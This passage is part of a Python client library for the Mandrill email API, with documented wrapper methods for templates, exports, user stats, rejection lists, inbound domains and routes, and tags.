(array): the list of labels applied to the template:: [].labels[] (string): a single label [].code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version [].subject (string): the subject line of the template, if provided - draft version [].from_email (string): the default sender address for the template, if provided - draft version [].from_name (string): the default sender from name for the template, if provided - draft version [].text (string): the default text part of messages sent with the template, if provided - draft version [].publish_name (string): the same as the template name - kept as a separate field for backwards compatibility [].publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published [].publish_subject (string): the subject line of the template, if provided [].publish_from_email (string): the default sender address for the template, if provided [].publish_from_name (string): the default sender from name for the template, if provided [].publish_text (string): the default text part of messages sent with the template, if provided [].published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published [].created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format [].updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'label': label} return self.master.call('templates/list', _params) def time_series(self, name): """Return the recent history (hourly stats for the last 30 days) for a template Args: name (string): the name of an existing template Returns: array. the array of history information:: [] (struct): the stats for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent during the hour [].hard_bounces (integer): the number of emails that hard bounced during the hour [].soft_bounces (integer): the number of emails that soft bounced during the hour [].rejects (integer): the number of emails that were rejected during the hour [].complaints (integer): the number of spam complaints received during the hour [].opens (integer): the number of emails opened during the hour [].unique_opens (integer): the number of unique opens generated by messages sent during the hour [].clicks (integer): the number of tracked URLs clicked during the hour [].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name} return self.master.call('templates/time-series', _params) def render(self, template_name, template_content, merge_vars=None): """Inject content and optionally merge fields into a template, returning the HTML that results Args: template_name (string): the immutable name of a template that exists in the user's account template_content (array): an array of template content to render. Each item in the array should be a struct with two keys - name: the name of the content block to set the content for, and content: the actual content to put into the block:: template_content[] (struct): the injection of a single piece of content into a single editable region:: template_content[].name (string): the name of the mc:edit editable region to inject into template_content[].content (string): the content to inject merge_vars (array): optional merge variables to use for injecting merge field content. If this is not provided, no merge fields will be replaced.:: merge_vars[] (struct): a single merge variable:: merge_vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _ merge_vars[].content (string): the merge variable's content Returns: struct. the result of rendering the given template with the content and merge field values injected:: html (string): the rendered HTML as a string Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'template_name': template_name, 'template_content': template_content, 'merge_vars': merge_vars} return self.master.call('templates/render', _params) class Exports(object): def __init__(self, master): self.master = master def info(self, id): """Returns information about an export job. If the export job's state is 'complete', the returned data will include a URL you can use to fetch the results. Every export job produces a zip archive, but the format of the archive is distinct for each job type. The api calls that initiate exports include more details about the output format for that job type. Args: id (string): an export job identifier Returns: struct. the information about the export:: id (string): the unique identifier for this Export. Use this identifier when checking the export job's status created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format type (string): the type of the export job - activity, reject, or whitelist finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format state (string): the export job's state - waiting, working, complete, error, or expired. result_url (string): the url for the export job's results, if the job is completed. Raises: UnknownExportError: The requested export job does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('exports/info', _params) def list(self, ): """Returns a list of your exports. Returns: array. the account's exports:: [] (struct): the individual export info:: [].id (string): the unique identifier for this Export. Use this identifier when checking the export job's status [].created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format [].type (string): the type of the export job - activity, reject, or whitelist [].finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format [].state (string): the export job's state - waiting, working, complete, error, or expired. [].result_url (string): the url for the export job's results, if the job is completed. Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('exports/list', _params) def rejects(self, notify_email=None): """Begins an export of your rejection blacklist. The blacklist will be exported to a zip archive containing a single file named rejects.csv that includes the following fields: email, reason, detail, created_at, expires_at, last_event_at, expires_at. Args: notify_email (string): an optional email address to notify when the export job has finished. Returns: struct. information about the rejects export job that was started:: id (string): the unique identifier for this Export. Use this identifier when checking the export job's status created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format type (string): the type of the export job finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run state (string): the export job's state result_url (string): the url for the export job's results, if the job is complete Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'notify_email': notify_email} return self.master.call('exports/rejects', _params) def whitelist(self, notify_email=None): """Begins an export of your rejection whitelist. The whitelist will be exported to a zip archive containing a single file named whitelist.csv that includes the following fields: email, detail, created_at. Args: notify_email (string): an optional email address to notify when the export job has finished. Returns: struct. information about the whitelist export job that was started:: id (string): the unique identifier for this Export. Use this identifier when checking the export job's status created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format type (string): the type of the export job finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run state (string): the export job's state result_url (string): the url for the export job's results, if the job is complete Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'notify_email': notify_email} return self.master.call('exports/whitelist', _params) def activity(self, notify_email=None, date_from=None, date_to=None, tags=None, senders=None, states=None, api_keys=None): """Begins an export of your activity history. The activity will be exported to a zip archive containing a single file named activity.csv in the same format as you would be able to export from your account's activity view. It includes the following fields: Date, Email Address, Sender, Subject, Status, Tags, Opens, Clicks, Bounce Detail. If you have configured any custom metadata fields, they will be included in the exported data. Args: notify_email (string): an optional email address to notify when the export job has finished date_from (string): start date as a UTC string in YYYY-MM-DD HH:MM:SS format date_to (string): end date as a UTC string in YYYY-MM-DD HH:MM:SS format tags (array): an array of tag names to narrow the export to; will match messages that contain ANY of the tags:: tags[] (string): a tag name senders (array): an array of senders to narrow the export to:: senders[] (string): a sender address states (array): an array of states to narrow the export to; messages with ANY of the states will be included:: states[] (string): a message state api_keys (array): an array of api keys to narrow the export to; messsagse sent with ANY of the keys will be included:: api_keys[] (string): an API key associated with your account Returns: struct. information about the activity export job that was started:: id (string): the unique identifier for this Export. Use this identifier when checking the export job's status created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format type (string): the type of the export job finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run state (string): the export job's state result_url (string): the url for the export job's results, if the job is complete Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'notify_email': notify_email, 'date_from': date_from, 'date_to': date_to, 'tags': tags, 'senders': senders, 'states': states, 'api_keys': api_keys} return self.master.call('exports/activity', _params) class Users(object): def __init__(self, master): self.master = master def info(self, ): """Return the information about the API-connected user Returns: struct. the user information including username, key, reputation, quota, and historical sending stats:: username (string): the username of the user (used for SMTP authentication) created_at (string): the date and time that the user's Mandrill account was created as a UTC string in YYYY-MM-DD HH:MM:SS format public_id (string): a unique, permanent identifier for this user reputation (integer): the reputation of the user on a scale from 0 to 100, with 75 generally being a "good" reputation hourly_quota (integer): the maximum number of emails Mandrill will deliver for this user each hour. Any emails beyond that will be accepted and queued for later delivery. Users with higher reputations will have higher hourly quotas backlog (integer): the number of emails that are queued for delivery due to exceeding your monthly or hourly quotas stats (struct): an aggregate summary of the account's sending stats:: stats.today (struct): stats for this user so far today:: stats.today.sent (integer): the number of emails sent for this user so far today stats.today.hard_bounces (integer): the number of emails hard bounced for this user so far today stats.today.soft_bounces (integer): the number of emails soft bounced for this user so far today stats.today.rejects (integer): the number of emails rejected for sending this user so far today stats.today.complaints (integer): the number of spam complaints for this user so far today stats.today.unsubs (integer): the number of unsubscribes for this user so far today stats.today.opens (integer): the number of times emails have been opened for this user so far today stats.today.unique_opens (integer): the number of unique opens for emails sent for this user so far today stats.today.clicks (integer): the number of URLs that have been clicked for this user so far today stats.today.unique_clicks (integer): the number of unique clicks for emails sent for this user so far today stats.last_7_days (struct): stats for this user in the last 7 days:: stats.last_7_days.sent (integer): the number of emails sent for this user in the last 7 days stats.last_7_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 7 days stats.last_7_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 7 days stats.last_7_days.rejects (integer): the number of emails rejected for sending this user in the last 7 days stats.last_7_days.complaints (integer): the number of spam complaints for this user in the last 7 days stats.last_7_days.unsubs (integer): the number of unsubscribes for this user in the last 7 days stats.last_7_days.opens (integer): the number of times emails have been opened for this user in the last 7 days stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 7 days stats.last_7_days.clicks (integer): the number of URLs that have been clicked for this user in the last 7 days stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 7 days stats.last_30_days (struct): stats for this user in the last 30 days:: stats.last_30_days.sent (integer): the number of emails sent for this user in the last 30 days stats.last_30_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 30 days stats.last_30_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 30 days stats.last_30_days.rejects (integer): the number of emails rejected for sending this user in the last 30 days stats.last_30_days.complaints (integer): the number of spam complaints for this user in the last 30 days stats.last_30_days.unsubs (integer): the number of unsubscribes for this user in the last 30 days stats.last_30_days.opens (integer): the number of times emails have been opened for this user in the last 30 days stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 30 days stats.last_30_days.clicks (integer): the number of URLs that have been clicked for this user in the last 30 days stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 30 days stats.last_60_days (struct): stats for this user in the last 60 days:: stats.last_60_days.sent (integer): the number of emails sent for this user in the last 60 days stats.last_60_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 60 days stats.last_60_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 60 days stats.last_60_days.rejects (integer): the number of emails rejected for sending this user in the last 60 days stats.last_60_days.complaints (integer): the number of spam complaints for this user in the last 60 days stats.last_60_days.unsubs (integer): the number of unsubscribes for this user in the last 60 days stats.last_60_days.opens (integer): the number of times emails have been opened for this user in the last 60 days stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 60 days stats.last_60_days.clicks (integer): the number of URLs that have been clicked for this user in the last 60 days stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 60 days stats.last_90_days (struct): stats for this user in the last 90 days:: stats.last_90_days.sent (integer): the number of emails sent for this user in the last 90 days stats.last_90_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 90 days stats.last_90_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 90 days stats.last_90_days.rejects (integer): the number of emails rejected for sending this user in the last 90 days stats.last_90_days.complaints (integer): the number of spam complaints for this user in the last 90 days stats.last_90_days.unsubs (integer): the number of unsubscribes for this user in the last 90 days stats.last_90_days.opens (integer): the number of times emails have been opened for this user in the last 90 days stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 90 days stats.last_90_days.clicks (integer): the number of URLs that have been clicked for this user in the last 90 days stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 90 days stats.all_time (struct): stats for the lifetime of the user's account:: stats.all_time.sent (integer): the number of emails sent in the lifetime of the user's account stats.all_time.hard_bounces (integer): the number of emails hard bounced in the lifetime of the user's account stats.all_time.soft_bounces (integer): the number of emails soft bounced in the lifetime of the user's account stats.all_time.rejects (integer): the number of emails rejected for sending this user so far today stats.all_time.complaints (integer): the number of spam complaints in the lifetime of the user's account stats.all_time.unsubs (integer): the number of unsubscribes in the lifetime of the user's account stats.all_time.opens (integer): the number of times emails have been opened in the lifetime of the user's account stats.all_time.unique_opens (integer): the number of unique opens for emails sent in the lifetime of the user's account stats.all_time.clicks (integer): the number of URLs that have been clicked in the lifetime of the user's account stats.all_time.unique_clicks (integer): the number of unique clicks for emails sent in the lifetime of the user's account Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('users/info', _params) def ping(self, ): """Validate an API key and respond to a ping Returns: string. the string "PONG!" Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('users/ping', _params) def ping2(self, ): """Validate an API key and respond to a ping (anal JSON parser version) Returns: struct. a struct with one key "PING" with a static value "PONG!" Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('users/ping2', _params) def senders(self, ): """Return the senders that have tried to use this account, both verified and unverified Returns: array. an array of sender data, one for each sending addresses used by the account:: [] (struct): the information on each sending address in the account:: [].address (string): the sender's email address [].created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the total number of messages sent by this sender [].hard_bounces (integer): the total number of hard bounces by messages by this sender [].soft_bounces (integer): the total number of soft bounces by messages by this sender [].rejects (integer): the total number of rejected messages by this sender [].complaints (integer): the total number of spam complaints received for messages by this sender [].unsubs (integer): the total number of unsubscribe requests received for messages by this sender [].opens (integer): the total number of times messages by this sender have been opened [].clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked [].unique_opens (integer): the number of unique opens for emails sent for this sender [].unique_clicks (integer): the number of unique clicks for emails sent for this sender Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('users/senders', _params) class Rejects(object): def __init__(self, master): self.master = master def add(self, email, comment=None, subaccount=None): """Adds an email to your email rejection blacklist. Addresses that you add manually will never expire and there is no reputation penalty for removing them from your blacklist. Attempting to blacklist an address that has been whitelisted will have no effect. Args: email (string): an email address to block comment (string): an optional comment describing the rejection subaccount (string): an optional unique identifier for the subaccount to limit the blacklist entry Returns: struct. a status object containing the address and the result of the operation:: email (string): the email address you provided added (boolean): whether the operation succeeded Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'email': email, 'comment': comment, 'subaccount': subaccount} return self.master.call('rejects/add', _params) def list(self, email=None, include_expired=False, subaccount=None): """Retrieves your email rejection blacklist. You can provide an email address to limit the results. Returns up to 1000 results. By default, entries that have expired are excluded from the results; set include_expired to true to include them. Args: email (string): an optional email address to search by include_expired (boolean): whether to include rejections that have already expired. subaccount (string): an optional unique identifier for the subaccount to limit the blacklist Returns: array. Up to 1000 rejection entries:: [] (struct): the information for each rejection blacklist entry:: [].email (string): the email that is blocked [].reason (string): the type of event (hard-bounce, soft-bounce, spam, unsub) that caused this rejection [].detail (string): extended details about the event, such as the SMTP diagnostic for bounces or the comment for manually-created rejections [].created_at (string): when the email was added to the blacklist [].last_event_at (string): the timestamp of the most recent event that either created or renewed this rejection [].expires_at (string): when the blacklist entry will expire (this may be in the past) [].expired (boolean): whether the blacklist entry has expired [].sender (struct): the sender that this blacklist entry applies to, or null if none.:: [].sender.address (string): the sender's email address [].sender.created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sender.sent (integer): the total number of messages sent by this sender [].sender.hard_bounces (integer): the total number of hard bounces by messages by this sender [].sender.soft_bounces (integer): the total number of soft bounces by messages by this sender [].sender.rejects (integer): the total number of rejected messages by this sender [].sender.complaints (integer): the total number of spam complaints received for messages by this sender [].sender.unsubs (integer): the total number of unsubscribe requests received for messages by this sender [].sender.opens (integer): the total number of times messages by this sender have been opened [].sender.clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked [].sender.unique_opens (integer): the number of unique opens for emails sent for this sender [].sender.unique_clicks (integer): the number of unique clicks for emails sent for this sender [].subaccount (string): the subaccount that this blacklist entry applies to, or null if none. Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'email': email, 'include_expired': include_expired, 'subaccount': subaccount} return self.master.call('rejects/list', _params) def delete(self, email, subaccount=None): """Deletes an email rejection. There is no limit to how many rejections you can remove from your blacklist, but keep in mind that each deletion has an affect on your reputation. Args: email (string): an email address subaccount (string): an optional unique identifier for the subaccount to limit the blacklist deletion Returns: struct. a status object containing the address and whether the deletion succeeded.:: email (string): the email address that was removed from the blacklist deleted (boolean): whether the address was deleted successfully. subaccount (string): the subaccount blacklist that the address was removed from, if any Raises: InvalidRejectError: The requested email is not in the rejection list InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'email': email, 'subaccount': subaccount} return self.master.call('rejects/delete', _params) class Inbound(object): def __init__(self, master): self.master = master def domains(self, ): """List the domains that have been configured for inbound delivery Returns: array. the inbound domains associated with the account:: [] (struct): the individual domain info:: [].domain (string): the domain name that is accepting mail [].created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format [].valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('inbound/domains', _params) def add_domain(self, domain): """Add an inbound domain to your account Args: domain (string): a domain name Returns: struct. information about the domain:: domain (string): the domain name that is accepting mail created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('inbound/add-domain', _params) def check_domain(self, domain): """Check the MX settings for an inbound domain. The domain must have already been added with the add-domain call Args: domain (string): an existing inbound domain Returns: struct. information about the inbound domain:: domain (string): the domain name that is accepting mail created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundDomainError: The requested inbound domain does not exist Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('inbound/check-domain', _params) def delete_domain(self, domain): """Delete an inbound domain from the account. All mail will stop routing for this domain immediately. Args: domain (string): an existing inbound domain Returns: struct. information about the deleted domain:: domain (string): the domain name that is accepting mail created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundDomainError: The requested inbound domain does not exist Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('inbound/delete-domain', _params) def routes(self, domain): """List the mailbox routes defined for an inbound domain Args: domain (string): the domain to check Returns: array. the routes associated with the domain:: [] (struct): the individual mailbox route:: [].id (string): the unique identifier of the route [].pattern (string): the search pattern that the mailbox name should match [].url (string): the webhook URL where inbound messages will be published Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundDomainError: The requested inbound domain does not exist Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('inbound/routes', _params) def add_route(self, domain, pattern, url): """Add a new mailbox route to an inbound domain Args: domain (string): an existing inbound domain pattern (string): the search pattern that the mailbox name should match url (string): the webhook URL where the inbound messages will be published Returns: struct. the added mailbox route information:: id (string): the unique identifier of the route pattern (string): the search pattern that the mailbox name should match url (string): the webhook URL where inbound messages will be published Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundDomainError: The requested inbound domain does not exist Error: A general Mandrill error has occurred """ _params = {'domain': domain, 'pattern': pattern, 'url': url} return self.master.call('inbound/add-route', _params) def update_route(self, id, pattern=None, url=None): """Update the pattern or webhook of an existing inbound mailbox route. If null is provided for any fields, the values will remain unchanged. Args: id (string): the unique identifier of an existing mailbox route pattern (string): the search pattern that the mailbox name should match url (string): the webhook URL where the inbound messages will be published Returns: struct. the updated mailbox route information:: id (string): the unique identifier of the route pattern (string): the search pattern that the mailbox name should match url (string): the webhook URL where inbound messages will be published Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundRouteError: The provided inbound route does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id, 'pattern': pattern, 'url': url} return self.master.call('inbound/update-route', _params) def delete_route(self, id): """Delete an existing inbound mailbox route Args: id (string): the unique identifier of an existing route Returns: struct. the deleted mailbox route information:: id (string): the unique identifier of the route pattern (string): the search pattern that the mailbox name should match url (string): the webhook URL where inbound messages will be published Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundRouteError: The provided inbound route does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('inbound/delete-route', _params) def send_raw(self, raw_message, to=None, mail_from=None, helo=None, client_address=None): """Take a raw MIME document destined for a domain with inbound domains set up, and send it to the inbound hook exactly as if it had been sent over SMTP Args: raw_message (string): the full MIME document of an email message to (array|null): optionally define the recipients to receive the message - otherwise we'll use the To, Cc, and Bcc headers provided in the document:: to[] (string): the email address of the recipient mail_from (string): the address specified in the MAIL FROM stage of the SMTP conversation. Required for the SPF check. helo (string): the identification provided by the client mta in the MTA state of the SMTP conversation. Required for the SPF check. client_address (string): the remote MTA's ip address. Optional; required for the SPF check. Returns: array. an array of the information for each recipient in the message (usually one) that matched an inbound route:: [] (struct): the individual recipient information:: [].email (string): the email address of the matching recipient [].pattern (string): the mailbox route pattern that the recipient matched [].url (string): the webhook URL that the message was posted to Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'raw_message': raw_message, 'to': to, 'mail_from': mail_from, 'helo': helo, 'client_address': client_address} return self.master.call('inbound/send-raw', _params) class Tags(object): def __init__(self, master): self.master = master def list(self, ): """Return all of the user-defined tag information Returns: array. a list of user-defined tags:: [] (struct): a user-defined tag:: [].tag (string): the actual tag as a string [].reputation (integer): the tag's current reputation on a scale from 0 to 100. [].sent (integer): the total number of messages sent with this tag [].hard_bounces (integer): the total number of hard bounces by messages with this tag [].soft_bounces (integer): the total number of soft bounces by messages with this tag [].rejects (integer): the total number of rejected messages with this tag [].complaints (integer): the total number of spam complaints received for messages with this tag [].unsubs (integer): the total number of unsubscribe requests received for messages with this tag [].opens (integer): the total number of times messages with this tag have been opened [].clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked [].unique_opens (integer): the number of unique opens for emails sent with this tag [].unique_clicks (integer): the number of unique clicks for emails sent with this tag Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('tags/list', _params) def delete(self, tag): """Deletes a tag permanently. Deleting a tag removes the tag from any messages that have been sent, and also deletes the tag's stats. There is no way to undo this operation, so use it carefully. Args: tag (string): a tag name Returns: struct. the tag that was deleted:: tag (string): the actual tag as a string reputation (integer): the tag's current reputation on a scale from 0 to 100. sent (integer): the total number of messages sent with this tag hard_bounces (integer): the total number of hard bounces by messages with this tag soft_bounces (integer): the total number of soft bounces by messages with this tag rejects (integer): the total number of rejected messages with this tag complaints (integer): the total number of spam complaints received for messages with this tag unsubs (integer): the total number of unsubscribe requests received for messages with this tag opens (integer): the total number of times messages with this tag have been opened clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked unique_opens (integer): the number of unique opens for emails sent with this tag unique_clicks (integer): the number of unique clicks for emails sent with this tag Raises: InvalidTagNameError: The requested tag does not exist or contains invalid characters InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'tag': tag} return self.master.call('tags/delete', _params) def info(self, tag): """Return more detailed information about a single tag, including aggregates of recent stats Args: tag (string): an existing tag name Returns: struct. the detailed information on the tag:: tag (string): the actual tag as a string sent (integer): the total number of messages sent with this tag hard_bounces (integer): the total number of hard bounces by messages with this tag soft_bounces (integer): the total number of soft bounces by messages with this tag rejects (integer): the total number of rejected messages with this tag complaints (integer): the total number of spam complaints received for messages with this tag unsubs (integer): the total number of unsubscribe requests received for messages with this tag opens (integer): the total number of times messages with this tag have been opened clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked stats (struct): an aggregate summary of the tag's sending stats:: stats.today (struct): stats with this tag so far today:: stats.today.sent (integer): the number of emails sent with this tag so far today stats.today.hard_bounces (integer): the number of emails hard bounced with this tag so far today stats.today.soft_bounces (integer): the number of emails soft bounced with this tag so far today stats.today.rejects (integer): the number of emails rejected for sending this tag so far today stats.today.complaints (integer): the number of spam complaints with this tag so far today stats.today.unsubs (integer): the number of unsubscribes with this tag so far today stats.today.opens (integer): the number of times emails have been opened with this tag so far today stats.today.unique_opens (integer): the number of unique opens for emails sent with this tag so far today stats.today.clicks (integer): the number of URLs that have been clicked with this tag so far today stats.today.unique_clicks (integer): the number of unique clicks for emails sent with this tag so far today stats.last_7_days (struct): stats with this tag in the last 7 days:: stats.last_7_days.sent (integer): the number of emails sent with this tag in the last 7 days stats.last_7_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 7 days stats.last_7_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 7 days stats.last_7_days.rejects (integer): the number of emails rejected for sending this tag in the last 7 days stats.last_7_days.complaints (integer): the number of spam complaints with this tag in the last 7 days stats.last_7_days.unsubs (integer): the number of unsubscribes with this tag in the last 7 days stats.last_7_days.opens (integer): the number of times emails have been opened with this tag in the last 7 days stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 7 days stats.last_7_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 7 days stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 7 days stats.last_30_days (struct): stats with this tag in the last 30 days:: stats.last_30_days.sent (integer): the number of emails sent with this tag in the last 30 days stats.last_30_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 30 days stats.last_30_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 30 days stats.last_30_days.rejects (integer): the number of emails rejected for sending this tag in the last 30 days stats.last_30_days.complaints (integer): the number of spam complaints with this tag in the last 30 days stats.last_30_days.unsubs (integer): the number of unsubscribes with this tag in the last 30 days stats.last_30_days.opens (integer): the number of times emails have been opened with this tag in the last 30 days stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 30 days stats.last_30_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 30 days stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 30 days stats.last_60_days (struct): stats with this tag in the last 60 days:: stats.last_60_days.sent (integer): the number of emails sent with this tag in the last 60 days stats.last_60_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 60 days stats.last_60_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 60 days stats.last_60_days.rejects (integer): the number of emails rejected for sending this tag in the last 60 days stats.last_60_days.complaints (integer): the number of spam complaints with this tag in the last 60 days stats.last_60_days.unsubs (integer): the number of unsubscribes with this tag in the last 60 days stats.last_60_days.opens (integer): the number of times emails have been opened with this tag in the last 60 days stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 60 days stats.last_60_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 60 days stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 60 days stats.last_90_days (struct): stats with this tag in the last 90 days:: stats.last_90_days.sent (integer): the number of emails sent with this tag in the last 90 days stats.last_90_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 90 days stats.last_90_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 90 days stats.last_90_days.rejects (integer): the number of emails rejected for sending this tag in the last 90 days stats.last_90_days.complaints (integer): the number of spam complaints with this tag in the last 90 days stats.last_90_days.unsubs (integer): the number of unsubscribes with this tag in the last 90 days stats.last_90_days.opens (integer): the number of times emails have been opened with this tag in the last 90 days stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 90 days stats.last_90_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 90 days stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 90 days Raises: InvalidTagNameError: The requested tag does not exist or contains invalid characters InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'tag': tag} return self.master.call('tags/info', _params) def time_series(self, tag): """Return the recent history (hourly stats for the last 30 days) for a tag Args: tag (string): an existing tag name Returns: array. the array of history information:: [] (struct): the stats for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent during the hour [].hard_bounces (integer): the number of emails that hard bounced during the hour [].soft_bounces (integer): the number of emails that soft bounced during the hour [].rejects (integer): the number of emails that were rejected during the hour [].complaints (integer): the number of spam complaints received during the hour [].unsubs (integer): the number of unsubscribes received during the hour [].opens (integer): the number of emails opened during the hour [].unique_opens (integer): the number of unique opens generated by messages sent during the hour [].clicks (integer): the number of tracked URLs clicked during the hour [].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour Raises: InvalidTagNameError: The requested tag does not exist or contains invalid characters InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'tag': tag} return self.master.call('tags/time-series', _params) def 